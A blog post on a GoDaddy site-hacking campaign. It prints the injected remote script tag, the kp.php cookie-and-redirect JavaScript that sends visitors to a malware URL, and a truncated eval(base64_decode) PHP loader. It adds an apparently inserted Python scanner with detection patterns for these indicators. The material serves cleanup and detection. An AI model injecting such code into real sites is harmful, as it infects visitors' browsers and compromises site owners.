Just a couple of days ago, another round of attacks was carried out against many sites hosted at GoDaddy.  The majority of the infected sites were Joomla and WordPress based.  I actually own one site that was compromised; thankfully it doesn’t get much traffic, as it was launched not too long ago.

Either way, I did dig into the files and found the JavaScript that was injected into many of the pages / posts on the site.  Here’s what it looks like:

<script src="http://kdjkfjskdfjlskdjf.com/kp.php">

Further investigation of the file revealed this source code (this is the kp.php file, by the way):

function setCookie(c_name, value, expiredays) {
    var exdate = new Date();
    exdate.setDate(exdate.getDate() + expiredays);
    document.cookie = c_name + "=" + escape(value) +
        ((expiredays == null) ? "" : ";expires=" + exdate.toGMTString());
}

function getCookie(c_name) {
    if (document.cookie.length > 0) {
        c_start = document.cookie.indexOf(c_name + "=");
        if (c_start != -1) {
            c_start = c_start + c_name.length + 1;
            c_end = document.cookie.indexOf(";", c_start);
            if (c_end == -1) c_end = document.cookie.length;
            return unescape(document.cookie.substring(c_start, c_end));
        }
    }
    return "";
}

// No marker cookie yet: set it for 20 days, then redirect the top-level window once.
var name = getCookie("pma_visited_theme1");
if (name == "") {
    setCookie("pma_visited_theme1", "1", 20);
    var url = "http://www3.workfree36-td.xorg.pl/?p=p52dcWpkbG6Hnc3KbmNToKV1iqHWnG3KXsWYlGhnZWuVmA%3D%3D";
    window.top.location.replace(url);
} else { }

The text in bold above is the source for the malware that’s actually called in to infect the user’s PC / browser.

Resolution? Easy, open up your index files and look for the following code:

<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ2..

Also, for the unlucky ones using WordPress, your themes folder houses all of your PHP files.  Go through them one by one and clean them up.
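To avoid opening every file by hand, here is a small Python scanner, added as an example and not part of the original post. It walks a site directory and lists files containing either indicator shown above: the `eval(base64_decode(` loader at the start of a PHP block, or a script tag that loads a remote `.php` URL. The pattern names, the extension list and the function names are assumptions chosen for this example.

```python
import os
import re
import sys

# Indicators taken from the post. The names are labels made up for this example.
PATTERNS = {
    # <?php /**/ eval(base64_decode("...   (the empty comment is optional)
    "php-eval-base64": re.compile(
        r"<\s*\?php\s*(?:/\*\*/\s*)?eval\s*\(\s*base64_decode\s*\(", re.I),
    # <script src="http://host/path.php">  (script loaded from a remote PHP URL)
    "remote-php-script-tag": re.compile(
        r"<\s*script[^>]*\bsrc\s*=\s*[\"']?https?://[^\"'\s>]+\.php\b", re.I),
}
SCAN_EXTENSIONS = (".php", ".html", ".htm", ".js")  # assumption: adjust per site


def scan_file(path):
    """Return (path, line_number, pattern_name) for every indicator hit."""
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    findings = []
    for name, rx in PATTERNS.items():
        for match in rx.finditer(text):
            line_no = text.count("\n", 0, match.start()) + 1
            findings.append((path, line_no, name))
    return findings


def scan_tree(root):
    """Walk root (themes folder included) and collect hits from matching files."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if fname.lower().endswith(SCAN_EXTENSIONS):
                findings.extend(scan_file(os.path.join(dirpath, fname)))
    return sorted(findings)


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "."
    for path, line_no, name in scan_tree(target):
        print(f"{path}:{line_no}: {name}")
```

Every hit is a candidate for manual review, not an automatic delete: compare the flagged file against a clean copy of the theme or core file before editing it.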

Just an FYI, I came across a tweet from GoDaddy confirming the hack, but they did not indicate how many sites were actually attacked / infected.

For help with such infections, or for solid, cheap and reliable hosting don’t hesitate to contact us for additional information.  We also provide SOLID and Black Hat free SEO services.

One Response to Another round of Godaddy sites hacked

  1. CrazyT says:

    great info! just what i needed to get my hosting account back in shape. even godaddy tech support didn’t have this information.
